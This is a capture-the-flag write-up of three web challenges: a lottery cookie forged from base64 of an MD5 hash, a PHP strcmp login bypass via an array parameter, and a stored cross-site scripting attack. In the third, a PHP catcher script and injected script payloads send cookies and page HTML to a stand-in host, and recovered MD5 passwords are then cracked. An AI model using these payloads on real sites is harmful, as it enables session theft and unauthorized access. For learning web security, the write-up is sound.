1 - Endless Lottery

We found this web site http://enei-x.dei.uc.pt/webhack3/ that is claiming to offer a prize when someone rolls the right number, but it's all a scam. Can you break the system to win the prize?!

The page looks like this:

The cookie changes when the page is refreshed, using a new browser session. In this session, my cookie was lotinfo="706:MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=". The second part of lotinfo seems to be a base64 encoded string.

$ base64 -d
MjlmMjI5OWNhNGIyNmZiZjQyYzIzZWU0N2M0MDExMjU=
29f2299ca4b26fbf42c23ee47c401125

Now, we have some kind of hash, 32 digits long. It can be a message-digest hash. Let's try to encrypt the ticket using the MD5 algorithm.

$ md5
1337810218
29F2299CA4B26FBF42C23EE47C401125

Nice! Now, we know that cookie = random_ID:base64(md5(ticket)). Since our goal is to win the lottery, all we need to do is to change the session cookie, using the winning ticket.

$ md5
1337500001
D50796F06CB23BE1A80284F80EAC0C2D
$ base64
d50796f06cb23be1a80284f80eac0c2d
ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ=

lotinfo="706:ZDUwNzk2ZjA2Y2IyM2JlMWE4MDI4NGY4MGVhYzBjMmQ="

Ok you win! Flag: 2d0ad06ff8349797176aad77e10edde031ec8c82

2 - Plain Auth

A friend has a service online and he says that he will never get hacked with his new bullet proof authentication mechanism. Can you prove him wrong?
http://enei-x.dei.uc.pt/webhack2/index.php

This was the login page (it's not working since I'm not running PHP):

When we submit the form, a new message shows up:

Let's try to search for strcmp vulnerabilities. The strcmp (string $str1, string $str2) function returns 0 if $str1 and $str2 are equal. When we inject an array in the GET password parameter we can bypass this comparison: index.php?password[]

\o/ Flag: 421c88ff643a053d2abf6b56936093a8cc5d5630

3 - Webhack 3

By analyzing some hack attempts in our HTTP logs we found a few scripts and those led us to an admin interface from our friend hacker. Can you get us inside?
http://enei-x.dei.uc.pt/webhack3/

This was the login page (it's not working since i'm not running the backend):

When we try to login using a random username and password the following message appears:

"An admin will track you by your IP"
Interesting... Let's try to steal some cookies! We need to set up a page to catch the cookie. I'm going to use PHP:

<?php
$data = $_GET['data'];
$f = fopen("log.txt", "a");
fwrite($f, $data."\n");
fclose($f);
?>

Let's inject a script in the username: <script>document.location("http://my-php-host/catch.php?data=" + document.cookie);</script>

Suddenly, this hint pops up:

Let's try to get the document HTML: <script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script>. It worked!

log.txt

<head></head><body><p>remember to set your cookie "token": 2272d26a38bc90570d633e7b3508c67a </p><table class="table"><thead><tr><th>IP Address</th><th>Username</th><th>Password</th></tr></thead><tbody><tr><td>192.168.2.10</td><td>Xiene1337</td><td>185de54b5a6fd960f48666edfa41e6c6</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>707d14da58ce62c08bba543fa62fe638</td></tr><tr><td>192.168.2.12</td><td>Xiene1337</td><td>74dade10c776b5ab3caf8cedb06860fb</td></tr><tr><td>127.0.0.1</td><td>script>document.location("http://my-php-host/catch.php?data=" + document.documentElement.innerHTML);</script></td></tr></tbody></table></body>

This HTML code looks like this:

If we try to login using the username Xiene1337 and setting document.cookie="token=2272d26a38bc90570d633e7b3508c67a" a new message appears:

The passwords in the log table may be MD5 hashes. Let's try to find them in MD5 databases.

MD5 Hash	Original password
185de54b5a6fd960f48666edfa41e6c6	ljbi
707d14da58ce62c08bba543fa62fe638	ljbp
74dade10c776b5ab3caf8cedb06860fb	ljbl

These passwords were mistyped by Xiene1337, since they are very similar. To find the correct password, just look to your keyboard! The correct password is ljbo.

\o/ Flag: 7b88396a68feaa7aa3c388227d749097cfbf99fe